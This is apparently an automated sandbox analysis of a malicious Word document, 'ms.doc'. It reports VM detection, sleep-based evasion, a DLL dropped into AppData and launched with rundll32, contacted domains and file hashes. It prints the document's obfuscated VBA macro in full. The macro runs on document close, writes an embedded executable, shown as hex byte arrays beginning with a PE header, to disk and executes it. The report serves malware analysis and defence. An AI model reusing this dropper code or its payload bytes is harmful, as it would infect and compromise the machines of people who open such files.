Source: C:\Windows\System32\rundll32.exe	Code function: 3_1_5ADE1F27 SHGetSpecialFolderPathW,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindFirstFileW,StrStrIW,SetCurrentDirectoryW,CreateFileW,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,FindNextFileW,FindClose,SetCurrentDirectoryW,	3_1_5ADE1F27
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_5ADE1F27 SHGetSpecialFolderPathW,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindFirstFileW,StrStrIW,SetCurrentDirectoryW,CreateFileW,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,FindNextFileW,FindClose,SetCurrentDirectoryW,	4_2_5ADE1F27
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_002315D0 calloc,calloc,calloc,wcscmp,free,GetFileAttributesW,memset,FindFirstFileW,FindNextFileW,FindNextFileW,wcscmp,wcscmp,memset,RemoveDirectoryW,free,free,FindClose,memset,memset,FindNextFileW,memset,memset,free,free,free,free,GetLastError,memset,memset,free,free,	4_2_002315D0

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 4904
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 4891
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 5528
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 443
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 1490

Found evasive API chain (may stop execution after accessing registry keys)

Show sources

Source: C:\Windows\System32\rundll32.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_4-27843

Found large amount of non-executed APIs

Show sources

Source: C:\Windows\System32\rundll32.exe

API coverage: 6.4 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\rundll32.exe TID: 3220	Thread sleep count: 4904 > 30
Source: C:\Windows\System32\rundll32.exe TID: 2288	Thread sleep count: 4891 > 30
Source: C:\Windows\System32\rundll32.exe TID: 3664	Thread sleep count: 5528 > 30
Source: C:\Windows\System32\rundll32.exe TID: 3664	Thread sleep time: -82920ms >= -60000ms
Source: C:\Windows\System32\rundll32.exe TID: 3652	Thread sleep count: 443 > 30
Source: C:\Windows\System32\rundll32.exe TID: 3652	Thread sleep count: 1490 > 30
Source: C:\Windows\System32\rundll32.exe TID: 3652	Thread sleep time: -149000ms >= -60000ms

Found stalling execution ending in API Sleep call

Show sources

Source: C:\Windows\System32\rundll32.exe

Stalling execution: Execution stalls by calling Sleep

graph_4-27920

Queries sensitive BIOS Information (via WMI, Win32_Bios, often done to detect virtual machines)

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecQuery - Select * from Win32_ComputerSystem

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_PnPEntity

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Document contains OLE streams with high entropy indicating encrypted embedded content

Show sources

Source: ms.doc

Stream path 'Data' entropy: 7.90682141357 (max. 8.0)

Stores large binary data to the registry

Show sources

Source: C:\Windows\System32\rundll32.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_63C137C0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_63C137C0

Contains functionality to query the account / user name

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_00233270 lstrcmpW,calloc,GetUserNameExW,calloc,calloc,GetUserNameExW,realloc,free,free,

4_2_00233270

Contains functionality to query time zone information

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_00232DD0 calloc,GetLocalTime,GetTimeZoneInformation,calloc,free,

4_2_00232DD0

Contains functionality to query windows version

Show sources

Source: C:\Windows\System32\rundll32.exe

4_2_63C07EC0

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\Windows\Fonts\batang.ttc VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\ms.doc VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Startup

system is w7_3

WINWORD.EXE (PID: 2644 MD5: 011578BCF2A97BCFF94E13D68FD1B8F1)

rundll32.exe (PID: 3208 cmdline: rundll32.exe C:\Users\paula\AppData\Roaming\Adobe\AIR\azgyrfhy.dat #2 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 756 cmdline: rundll32 C:\Users\paula\AppData\Roaming\Adobe\AIR\azgyrfhy.dat #2 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Created / dropped Files

File Path	Type and Hashes
C:\Users\paula\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AD282D71-1A20-49DD-89AA-9DCD26942D94}.tmp	Type: data MD5: 5D4D94EE7E06BBB0AF9584119797B23A SHA: DBB111419C704F116EFA8E72471DD83E86E49677 SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
C:\Users\paula\AppData\Roaming\Adobe\AIR\azgyrfhy.dat	Type: PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows MD5: E9A1487826889DB9BE298CA57E8C2C7B SHA: DFF07D564F6C30252162C09A146BF8089DD6DE64 SHA-256: 4C28EED5D92745C416CD03D8CC97A9F9C4A81A1EE0E992C03C30E9539E1E230B SHA-512: 978D079E77942646B712B4D60F60AA5F533CC7F6BB79D28E3AF7C37AF03CDAFC9162049181D33EAEE5C9856EF842F589099ABA1E0768EBBAB85D062D297D6D16
C:\Users\paula\AppData\Roaming\Microsoft\Office\Recent\index.dat	Type: ASCII text, with CRLF line terminators MD5: 152A8E8810AE473C10308F0A773AD768 SHA: A0C897F94D99BFA687DE5C35E9DDB1543882E76B SHA-256: 1F2E48D6A0ABEAA5730B5451B920E9726F1E8090D897A6EE3310C19E1E5278CB SHA-512: 43E90FB24D49A9D1BA15A80EDE8A7E3A489BD48056821213FDD176000FE5DD46739FBA1B48D323DE618A7BE3A42A23C4B40D37B72F44060CBF9ABA56583A3CDC
C:\Users\paula\AppData\Roaming\Microsoft\Office\Recent\ms.LNK	Type: MS Windows shortcut MD5: 370FD91C4460C9EE9691BECBDD23D10E SHA: 0740C3ED597FB8F82CBCB3FFFDAE5174EF8E0125 SHA-256: C3D78E2D4A3BCD4FDC9BCECEDA5794C218BABE1DBCDADF2C7DA7FE237CA320FF SHA-512: 7DC1121E895044D7071BF53F2FC8BD8BEB12142A5C6D73AAE4593D854ECDF2F44852EBAD5F0A7587DBAEC4AF43A5DAD2B8F20A8E45A71A91703A2FD7E7A279F8
C:\Users\paula\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	Type: data MD5: FDE8B2BA884CEC928ED4E2CB9B1F8D45 SHA: 349AEE8579E03A822504D8915C760830D97E8DEF SHA-256: 07136E56792515823E0903D4FBC116DDADAFD545B9A370024683CF8461B66096 SHA-512: F1029B4B069FFE5F843F239FF136317FA9AD739DCF9AFCDA5B35707BA3B8FB17BB4C12B16E85214C92A775163EFF2E8A0CC2BD82F705591170D86D7C17D19CB8
C:\Users\paula\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC	Type: Little-endian UTF-16 Unicode text, with CR line terminators MD5: 6A9D45E3778590C93851D20663044D51 SHA: 11724509518FE2C35071DF9C234D891088ED697A SHA-256: C1F1FA095B195EDE01F1FEBDECB7C9F0D73BCDFBD9B0535563A61809F08323EE SHA-512: E3FC0E990E3DC6EF00A91FFC9EC0EDBFD25FF298D9FC4D8775D6FA52F80D61A165A13E785D7EB167CEFBCA2C84FE28750FE61FB3BCF5ECBAB759D3ED47B27BF4
C:\Users\paula\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex	Type: Little-endian UTF-16 Unicode text, with no line terminators MD5: F3B25701FE362EC84616A93A45CE9998 SHA: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
C:\~$ms.doc	Type: data MD5: 4753169331658DD3BF7D3879A7C9BE1F SHA: 70EC32CB4D2275A884ABF65B8370EAC35B96A7A5 SHA-256: C00CEE936FBA2DB289256E409F09DA439B7894BDB3D3D563ABFCF3AD245191DD SHA-512: 864331AC8928BC9113D751EE1292D94D94F1AD14022FA016E636EC4B21A5F30F9E02766586F50812EAFF3F00B4ADB55F46DC5CD10E3358EC55B2269D1AFD5CB1
\srvsvc	Type: Hitachi SH big-endian COFF object, not stripped MD5: D884F11425D5AF71152E5C25D817AF94 SHA: F7DC9DB9BE60C05AA021361DEF56B8C416E4534B SHA-256: 20A48F2BFC8BD3ADE96FE517B3D8ACE9A76B0CF2B329995B97F82A355F5FC7F5 SHA-512: 6B28B3B9AD5DCAF1FB8C3FC2071625885C9278EF1038DC5EF4B31A86ECE635ECC43518F295AC5FF434B817DB219643AD2F16774153FBC5EF34ED6C0DA7D64388

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active
www.diefenbachgymnasium.at	176.9.16.213	true
www.multipassplus.eu	85.90.53.159	true

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name
8.8.8.8	United States	15169	GoogleInc
85.90.53.159	United Kingdom	39116	TelehouseInternationalCorporationofEuropeLtd
176.9.16.213	Germany	24940	HetznerOnlineAG

Static File Info

General
File type:	0
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	ms.doc
File size:	417792
MD5:	af0e156bd39be48edd884578616ab153
SHA1:	94c5ca0a2774829df7a98c1d5f05bdf1c4892519
SHA256:	f13a11cdbbb30193121b6da215f0792c75945f950ccef7d9be530c25851bd065
SHA512:	099a6c5e7645393286b1d9f6ca8d44321454476202f7c7ede6e6e2301e8150dc5d264a463e5ce5eab59fd307ba5d27208f90d74bc4c91a98baeb427e09754905

File Icon

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:	Top Risks 2016
Subject:
Author:	EG_CKupchan
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	EG_CKupchan
Revion Number:	2
Total Edit Time:	0
Create Time:	2016-08-25 12:39:00
Last Saved Time:	2016-08-25 12:39:00
Number of Pages:	1
Number of Words:	1446
Number of Characters:	8245
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Document Code Page:	1252
Number of Lines:	68
Number of Paragraphs:	19
Thumbnail Scaling Desired:	False
Company:	Eurasiagroup.net
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Class1.cls, Stream Size: 5637

General
Stream Path:	Macros/VBA/Class1
VBA File Name:	Class1.cls
Stream Size:	5637
Data ASCII:	. . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . } . . . . . . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 01 f0 00 00 00 ac 04 00 00 d4 00 00 00 30 02 00 00 ff ff ff ff c9 04 00 00 7d 0e 00 00 00 00 00 00 01 00 00 00 87 5c be d4 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code with Deobfuscations

Attribute VB_Name = "Class1"

Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = False

Attribute VB_Exposed = False

Attribute VB_TemplateDerived = False

Attribute VB_Customizable = False



Dim rrokfpa As Integer

Public WithEvents xyyac As Word.Application

Attribute xyyac.VB_VarHelpID = -1

Private Sub xyyac_DocumentBeforeClose(ByVal rbgsls As Document, ualysqs As Boolean)

    If rrokfpa > (-635 + 635) Then Exit Sub

    rrokfpa = rrokfpa + (-1412 + 1413)

    Dim kdpcjemqh

    Dim edxjnymd

    edxjnymd = Array()

    bfllezfdh edxjnymd

    kdpcjemqh = wgexjhl(edxjnymd)

    'WScript.StdOut.Write kdpcjemqh

    Dim byfivenf

    Set byfivenf = CreateObject("Scripting.FileSystemObject")

    Dim afpkh: Set afpkh = CreateObject("WScript.Shell")

    Dim scgzdrkmc

    On Error Resume Next

    Dim bupvupdyu As String

    bupvupdyu = afpkh.ExpandEnvironmentStrings(pedugbr(Array(240, (8405 - 8257), (-8353 + 8486), (4508 - 4375), (-4516 + 4661), (8215 - 8067), (-221 + 350), (-8839 + 8987), (2865 - 2625), (5557 - 5420), 148, (-8210 + 8387), (-3782 + 3968), (-9105 + 9288), (-8111 + 8287), 137, 148, (2515 - 2359), (5998 - 5863), 137, (-37 + 217), 175, 178, (-5460 + 5632), (-7127 + 7294), (-4668 + 4847), 189, (332 - 160), ( -9117 + 9368), (-446 + 623), (2217 - 2037), (4051 - 3890)), (9832 - 9619)))

    Set scgzdrkmc = byfivenf.CreateTextFile(bupvupdyu)

    If Err.Number <> (9752 - 9752) Then

        Dim ejuyjco As String

        Dim pkjhnpvxn

        ejuyjco = pedugbr(Array(), (-2644 + 2727))

        pkjhnpvxn = Split(bupvupdyu, pedugbr(Array((2924 - 2825)), (7128 - 7065)))

        wolfmy = UBound(pkjhnpvxn)

        If Mid(bupvupdyu, Len(bupvupdyu), (-1676 + 1677)) <> pedugbr(Array((-2597 + 2849)), (-2010 + 2170)) Then wolfmy = wolfmy - (-4391 + 4392)

        For ehhnqmy = (-1650 + 1650) To wolfmy

            ejuyjco = ejuyjco & pkjhnpvxn(ehhnqmy) & pedugbr(Array((-8125 + 8379)), (9853 - 9691))

            If Len(Dir(ejuyjco, boflmren)) = 0 Then MkDir ejuyjco

        Next

        Err.Clear

        Set scgzdrkmc = byfivenf.CreateTextFile(bupvupdyu)

        If Err.Number <> 0 Then Exit Sub

    End If

    scgzdrkmc.Write kdpcjemqh

    scgzdrkmc.Close

    Set zjctpculj = afpkh.Exec(pedugbr(Array((3254 - 3110), (4629 - 4478), (4958 - 4818), 134, (1841 - 1699), (6400 - 6258), 209, 208, (9750 - 9546), 135, (-6845 + 6999), (3153 - 3018), 194), (-6002 + 6228)) + pedugbr(Array((8843 - 8640), 175, (1586 - 1396), (-9167 + 9357 ), (6597 - 6427), (4000 - 3825), (-8157 + 8343), (1910 - 1735), (9203 - 9000), (-8029 + 8207), (3029 - 2854), (-7305 + 7443), (1029 - 900),  140, (7722 - 7583), (3774 - 3596), (-7170 + 7345), (4812 - 4645), (3540 - 3352), 178, (-6374 + 6517), (929 - 781), (-775 + 912), (5871 - 5720 ), (6327 - 6171), (1749 - 1613), (1999 - 1865), (-1096 + 1247), (3123 - 2931), 138, (-183 + 326), (1789 - 1635)), 238) + pedugbr(Array( (-2831 + 2912), (2796 - 2703), (-2647 + 2741), (4801 - 4722)), (8907 - 8782)))

End Sub

VBA Code

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Dim rrokfpa As Integer
Public WithEvents xyyac As Word.Application
Attribute xyyac.VB_VarHelpID = -1
Private Sub xyyac_DocumentBeforeClose(ByVal rbgsls As Document, ualysqs As Boolean)
If rrokfpa > (-635 + 635) Then Exit Sub
rrokfpa = rrokfpa + (-1412 + 1413)
Dim kdpcjemqh
Dim edxjnymd
edxjnymd = Array()
bfllezfdh edxjnymd
kdpcjemqh = wgexjhl(edxjnymd)
'WScript.StdOut.Write kdpcjemqh
Dim byfivenf
Set byfivenf = CreateObject("Scripting.FileSystemObject")
Dim afpkh: Set afpkh = CreateObject("WScript.Shell")
Dim scgzdrkmc
On Error Resume Next
 Dim bupvupdyu As String
bupvupdyu = afpkh.ExpandEnvironmentStrings(pedugbr(Array(240, (8405 - 8257), (-8353 + 8486), (4508 - 4375), (-4516 + 4661), (8215 - 8067), (-221 + 350), (-8839 + 8987), (2865 - 2625), (5557 - 5420), 148, (-8210 + 8387), (-3782 + 3968), (-9105 + 9288), (-8111 + 8287), 137, 148, (2515 - 2359), (5998 - 5863), 137, (-37 + 217), 175, 178, (-5460 + 5632), (-7127 + 7294), (-4668 + 4847), 189, (332 - 160), ( -9117 + 9368), (-446 + 623), (2217 - 2037), (4051 - 3890)), (9832 - 9619)))
Set scgzdrkmc = byfivenf.CreateTextFile(bupvupdyu)
If Err.Number <> (9752 - 9752) Then
Dim ejuyjco As String
Dim pkjhnpvxn
ejuyjco = pedugbr(Array(), (-2644 + 2727))
pkjhnpvxn = Split(bupvupdyu, pedugbr(Array((2924 - 2825)), (7128 - 7065)))
wolfmy = UBound(pkjhnpvxn)
If Mid(bupvupdyu, Len(bupvupdyu), (-1676 + 1677)) <> pedugbr(Array((-2597 + 2849)), (-2010 + 2170)) Then wolfmy = wolfmy - (-4391 + 4392)
For ehhnqmy = (-1650 + 1650) To wolfmy
ejuyjco = ejuyjco & pkjhnpvxn(ehhnqmy) & pedugbr(Array((-8125 + 8379)), (9853 - 9691))
If Len(Dir(ejuyjco, boflmren)) = 0 Then MkDir ejuyjco
Next
Err.Clear
Set scgzdrkmc = byfivenf.CreateTextFile(bupvupdyu)
If Err.Number <> 0 Then Exit Sub
End If
scgzdrkmc.Write kdpcjemqh
scgzdrkmc.Close
Set zjctpculj = afpkh.Exec(pedugbr(Array((3254 - 3110), (4629 - 4478), (4958 - 4818), 134, (1841 - 1699), (6400 - 6258), 209, 208, (9750 - 9546), 135, (-6845 + 6999), (3153 - 3018), 194), (-6002 + 6228)) + pedugbr(Array((8843 - 8640), 175, (1586 - 1396), (-9167 + 9357 ), (6597 - 6427), (4000 - 3825), (-8157 + 8343), (1910 - 1735), (9203 - 9000), (-8029 + 8207), (3029 - 2854), (-7305 + 7443), (1029 - 900),  140, (7722 - 7583), (3774 - 3596), (-7170 + 7345), (4812 - 4645), (3540 - 3352), 178, (-6374 + 6517), (929 - 781), (-775 + 912), (5871 - 5720 ), (6327 - 6171), (1749 - 1613), (1999 - 1865), (-1096 + 1247), (3123 - 2931), 138, (-183 + 326), (1789 - 1635)), 238) + pedugbr(Array( (-2831 + 2912), (2796 - 2703), (-2647 + 2741), (4801 - 4722)), (8907 - 8782)))
End Sub

VBA File Name: Module1.bas, Stream Size: 82528

General
Stream Path:	Macros/VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	82528
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . . . . \\ 5 , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 12 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 24 12 00 00 c8 e7 00 00 00 00 00 00 01 00 00 00 87 5c 35 2c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code with Deobfuscations

Attribute VB_Name = "Module1"



Dim ayyvl As New Class1

Sub gybmpmh()

    Set ayyvl.xyyac = Word.Application

End Sub

Sub nhbminn(ByRef bwoqrj, buocduzjc)

    Dim ehhnqmy

    On Error Resume Next

    wmepjfbcg = UBound(bwoqrj)

    If Err.Number <> (740 - 740) Then

        wmepjfbcg = -(5918 - 5917)

    End If

    On Error GoTo 0

    

    aakrflbn = UBound(buocduzjc)

    ReDim Preserve bwoqrj(wmepjfbcg + aakrflbn + 1)

    For ehhnqmy = (4056 - 4056) To aakrflbn

        bwoqrj(ehhnqmy + wmepjfbcg + 1) = buocduzjc(ehhnqmy)

    Next

End Sub

Function wgexjhl(cdnkyy)

    Dim ehhnqmy

    wgexjhl = pedugbr(Array(), (-339 + 555))

    For ehhnqmy = LBound(cdnkyy) To UBound(cdnkyy)

        wgexjhl = wgexjhl & (Chr(cdnkyy(ehhnqmy)))

    Next

End Function

Sub jncepsvg(ByRef bwoqrj)

    nhbminn bwoqrj, Array(&H4D, &H5A, &H90, &H0, &H3, &H0, &H0, &H0, &H4, &H0, &H0, &H0, &HFF, &HFF, &H0, &H0, &HB8 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H40, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0,  &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H80, &H0, &H0, &H0, &HE, &H1F, &HBA, &HE, &H0, &HB4, &H9, &HCD, &H21, &HB8, &H1, &H4C, &HCD, &H21 , &H54, &H68, &H69, &H73, &H20, &H70, &H72, &H6F, &H67, &H72, &H61, &H6D, &H20, &H63, &H61, &H6E, &H6E, &H6F)

    nhbminn bwoqrj, Array(&H74, &H20, &H62, &H65, &H20, &H72, &H75, &H6E, &H20, &H69, &H6E, &H20, &H44, &H4F, &H53, &H20, &H6D , &H6F, &H64, &H65, &H2E, &HD, &HD, &HA, &H24, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H50, &H45, &H0, &H0, &H4C,  &H1, &H4, &H0, &H50, &H31, &H59, &H31, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &HE0, &H0, &HE, &H23, &HB, &H1, &H2, &H18, &H0, &H1A, &H0, &H0, &H0, &HA, &H0, &H0, &H0, &H0, &H0, &H0, &HF9, &H23, &H0, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H40, &H0, &H0, &H10, &H0, &H0, &H0, &H2, &H0, &H0)

    nhbminn bwoqrj, Array(&H1, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H3, &H0, &HA, &H0, &H0, &H0, &H0, &H0, &H0 , &H60, &H0, &H0, &H0, &H4, &H0, &H0, &HF6, &H83, &H0, &H0, &H3, &H0, &H40, &H0, &H0, &H10, &H0, &H0, &H0,  &H10, &H0, &H0, &H0, &H0, &H1, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H10, &H0, &H0, &H0, &H0, &H40, &H0, &H0, &H68, &H0, &H0, &H0, &H0, &H30, &H0, &H0, &HFA, &H4, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0)

    nhbminn bwoqrj, Array(&H0, &H50, &H0, &H0, &H80, &H1, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0,  &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H2E, &H63, &H6F, &H64, &H65, &H0, &H0, &H0)

    nhbminn bwoqrj, Array(&H2, &H18, &H0, &H0, &H0, &H10, &H0, &H0, &H0, &H1A, &H0, &H0, &H0, &H4, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H20, &H0, &H30, &HE0, &H2E, &H69, &H64, &H61, &H74,  &H61, &H0, &H0, &HFA, &H4, &H0, &H0, &H0, &H30, &H0, &H0, &H0, &H6, &H0, &H0, &H0, &H1E, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H40, &H0, &H30, &HC0, &H2E, &H65, &H64, &H61, &H74, &H61 , &H0, &H0, &H68, &H0, &H0, &H0, &H0, &H40, &H0, &H0, &H0, &H2, &H0, &H0, &H0, &H24, &H0, &H0)

